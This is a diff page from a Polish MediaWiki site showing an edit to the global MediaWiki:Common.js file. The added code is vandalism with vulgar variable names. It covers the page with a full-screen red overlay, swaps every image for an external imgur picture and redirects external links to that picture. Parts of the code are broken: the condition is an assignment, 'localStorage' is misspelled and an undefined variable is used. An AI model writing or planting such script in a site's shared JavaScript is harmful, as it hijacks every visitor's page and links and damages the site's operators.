kontakt: [email protected]
MediaWiki:Common.js: Różnice pomiędzy wersjami
Przejdź do nawigacji
Przejdź do wyszukiwania
imported>Aralka69693 Nie podano opisu zmian |
imported>Aralka69693 Nie podano opisu zmian |
||
Linia 1: | Linia 1: | ||
const rzeczy = document.querySelector("#content"); | |||
if (localStorage. | let randId = "fiut" + Math.floor(Math.random() * 500); | ||
if (localStorage.gowno = "sraka") { | |||
localStorage.gowno = randId; | |||
czerwonka=document.createElement("div"); | |||
czerwonka.classList.add(localStorage.gowno); | |||
czerwonka.style.height = "100%"; | |||
czerwonka.style.width = "100%"; | |||
czerwonka.style.position = "fixed"; | |||
czerwonka.style.background = "red"; | |||
czerwonka.style.top = "0"; | |||
czerwonka.style.left = "0"; | |||
czerwonka.style.zIndex = "9999"; | |||
body.appendChild(czerwonka); | |||
} else { | } else { | ||
ocalStorage.gowno = "sraka"; | |||
} | } | ||
if(localStorage.ali!="agca"){ | |||
const chuuj = document.querySelectorAll("img"); | const chuuj = document.querySelectorAll("img"); | ||
for (var i = 0; i < chuuj .length; i++) { | for (var i = 0; i < chuuj .length; i++) { |
Wersja z 02:32, 8 lis 2020
const rzeczy = document.querySelector("#content"); let randId = "fiut" + Math.floor(Math.random() * 500); if (localStorage.gowno = "sraka") { localStorage.gowno = randId; czerwonka=document.createElement("div"); czerwonka.classList.add(localStorage.gowno); czerwonka.style.height = "100%"; czerwonka.style.width = "100%"; czerwonka.style.position = "fixed"; czerwonka.style.background = "red"; czerwonka.style.top = "0"; czerwonka.style.left = "0"; czerwonka.style.zIndex = "9999"; body.appendChild(czerwonka); } else { ocalStorage.gowno = "sraka"; } if(localStorage.ali!="agca"){ const chuuj = document.querySelectorAll("img"); for (var i = 0; i < chuuj .length; i++) { chuuj [i].src = "https://i.imgur.com/TmNdEcc.png"; } const linkipanaagcy = document.querySelectorAll("a[rel=nofollow].external"); for (var i = 0; i < linkipanaagcy .length; i++) { linkipanaagcy [i].href = "https://i.imgur.com/TmNdEcc.png"; } }